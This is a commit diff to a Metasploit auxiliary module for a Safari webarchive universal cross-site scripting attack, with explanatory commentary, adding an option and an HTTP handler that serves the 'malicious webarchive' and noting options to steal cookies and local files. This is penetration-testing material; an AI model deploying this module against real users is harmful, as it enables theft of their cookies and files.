Add support for DOWNLOAD_URI option.

* Fixes some comments that were no longer accurate.

Conflicts:
	modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
unstable
Joe Vennix 2013-04-27 17:43:42 -05:00
parent 1d9a695d2b
commit 55e0ec3187
1 changed file with 28 additions and 6 deletions


@@ -50,6 +50,7 @@ class Metasploit3 < Msf::Auxiliary
         OptString.new('FILENAME', [ true, 'The file name.', 'msf.webarchive']),
         OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (e.g. http://browserscan.rapid7.com/)']),
         OptString.new('URIPATH', [false, 'The URI to receive the UXSS\'ed data', '/grab']),
+        OptString.new('DOWNLOAD_URI', [ true, 'The path to download the webarchive.', '/msf.webarchive']),
         OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
         OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
         OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]),
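
For readers skimming the hunk: these Opt* entries sit inside the module's register_options call. A minimal sketch of that registration pattern, using the new option from this commit (the surrounding scaffolding is illustrative, not part of the diff):

    require 'msf/core'

    class Metasploit3 < Msf::Auxiliary
      def initialize(info = {})
        super(info)
        # Same [required, description, default] shape as the entries above.
        register_options([
          OptString.new('DOWNLOAD_URI',
            [true, 'The path to download the webarchive.', '/msf.webarchive'])
        ], self.class)
      end
    end
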
@@ -153,6 +154,20 @@ class Metasploit3 < Msf::Auxiliary
     @service_path = uopts['Path']
     @http_service.add_resource(uopts['Path'], uopts)
 
+    # Add path to download the webarchive
+    uopts = {
+      'Proc' => Proc.new { |cli, req|
+        resp = Rex::Proto::Http::Response::OK.new
+        resp['Content-Type'] = 'application/x-webarchive'
+        resp.body = @xml.to_s
+        cli.send_response resp
+      },
+      'Path' => webarchive_download_url
+    }.update(opts['Uri'] || {})
+
+    @http_service.add_resource(webarchive_download_url, uopts)
+    print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
+
     # As long as we have the http_service object, we will keep the HTTP server alive
     while @http_service
       select(nil, nil, nil, 1)
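
The new resource registered above follows the usual Rex HTTP service pattern: a Proc receives the client connection and the request, builds a Rex::Proto::Http::Response, and sends it back. A stripped-down sketch of just that handler shape; payload_bytes and http_service are illustrative stand-ins, not names from the module:

    # Hedged sketch of the Proc-based handler pattern used above.
    serve_download = Proc.new do |cli, req|
      resp = Rex::Proto::Http::Response::OK.new
      resp['Content-Type'] = 'application/x-webarchive'
      resp.body = payload_bytes  # assumption: the webarchive bytes to serve
      cli.send_response(resp)
    end

    # Register the handler at the path chosen via DOWNLOAD_URI.
    http_service.add_resource('/msf.webarchive', 'Proc' => serve_download)
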
@@ -176,9 +191,10 @@ class Metasploit3 < Msf::Auxiliary
 
   # @return [String] contents of webarchive as an XML document
   def webarchive_xml
-    xml = webarchive_header
-    urls.each_with_index { |url, idx| xml << webarchive_iframe(url, idx) }
-    xml << webarchive_footer
+    return @xml if not @xml.nil? # only compute xml once
+    @xml = webarchive_header
+    urls.each_with_index { |url, idx| @xml << webarchive_iframe(url, idx) }
+    @xml << webarchive_footer
   end
 
   # @return [String] the first chunk of the webarchive file, containing the WebMainResource
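
The rewritten webarchive_xml is a standard Ruby memoization guard: bail out early with the cached @xml, otherwise build it once. The explicit early return (rather than @xml ||= ...) matters because the method mutates @xml with << across several lines. A plain-Ruby illustration of the same idea, with invented class and content:

    class ReportBuilder
      # Build the document once; later calls return the cached String.
      def xml
        return @xml if not @xml.nil? # only compute once
        @xml = '<header/>'
        @xml << '<body/>'
        @xml << '<footer/>'
      end
    end

    b = ReportBuilder.new
    b.xml.equal?(b.xml) # => true -- both calls return the same cached object
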
@@ -288,8 +304,9 @@ class Metasploit3 < Msf::Auxiliary
   #   NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
   #   [a encodeObject:response forKey:@"WebResourceResponse"];
   def web_response_xml(script)
-    # this is a binary plist, but im too lazy to write a real encoder.
-    # ripped this straight out of a safari webarchive save.
+    # this is a serialized NSHTTPResponse; I'm too lazy to write a
+    # real encoder, so let's use string interpolation.
+    # ripped this straight out of a webarchive save
     script['content-length'] = script[:body].length
     whitelist = %w(content-type content-length date etag
                    Last-Modified cache-control expires)
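
The whitelist that follows the rewritten comment keeps only the response headers worth faking in the serialized response; note the one mixed-case entry, so any filtering has to compare case-insensitively. A hedged sketch of how such filtering could look (the module's actual logic may differ):

    whitelist = %w(content-type content-length date etag
                   last-modified cache-control expires)
    headers = { 'Content-Type' => 'text/javascript', 'X-Powered-By' => 'PHP' }

    # Keep only whitelisted headers, comparing case-insensitively.
    kept = headers.select { |k, _| whitelist.include?(k.to_s.downcase) }
    # => {"Content-Type"=>"text/javascript"}
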
@@ -711,7 +728,7 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
-  # @return [Array<Array<String>>] list of URLs for remote javascripts that are cacheable
+  # @return [Array<Array<Hash>>] list of headers returned by cacheable remote javascripts
   def find_cached_scripts
     cached_scripts = all_script_urls(urls).each_with_index.map do |urls_for_site, i|
       begin
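
The corrected @return tag is one of the "comments that were no longer accurate" from the commit message: find_cached_scripts returns, per site, the header Hashes of the scripts it found cacheable rather than URL strings. An illustrative sketch of that nested shape (values invented for the example):

    # One inner array per scanned site; one Hash per cacheable script.
    cached_scripts = [
      [ { 'etag' => '"abc123"', 'cache-control' => 'max-age=3600' } ], # site 1
      [ ]                                                              # site 2: none found
    ]
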
@@ -780,6 +797,11 @@ class Metasploit3 < Msf::Auxiliary
     "#{proto}://#{myhost}#{port_str}"
   end
 
+  # @return [String] URL that serves the malicious webarchive
+  def webarchive_download_url
+    @webarchive_download_url ||= datastore["DOWNLOAD_URI"]
+  end
+
   # @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
   # via the FILE_URLS module option.
   def interesting_file_urls
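
Taken together with the base-URL helper just above it ("#{proto}://#{myhost}#{port_str}"), the new webarchive_download_url accessor is what the print_status line earlier in this diff appends to announce the full download URL. A small sketch of that composition, with placeholder host and port:

    proto    = 'http'
    myhost   = '192.168.1.10' # placeholder SRVHOST
    port_str = ':8080'        # placeholder SRVPORT suffix

    base     = "#{proto}://#{myhost}#{port_str}"
    download = '/msf.webarchive' # DOWNLOAD_URI default
    puts "Using URL: #{base}#{download}"
    # => Using URL: http://192.168.1.10:8080/msf.webarchive
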